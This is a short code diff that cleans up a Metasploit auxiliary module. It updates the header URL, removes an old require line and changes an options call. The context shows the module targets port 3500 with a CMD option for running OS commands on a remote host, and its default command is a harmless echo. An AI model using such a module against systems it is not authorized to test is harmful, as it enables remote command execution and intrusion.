@@ -1,13 +1,9 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
-
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
@@ -32,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
         [
           Opt::RPORT(3500),
           OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > metasploit.txt']),
-        ], self.class)
+        ])
   end
 
   def run
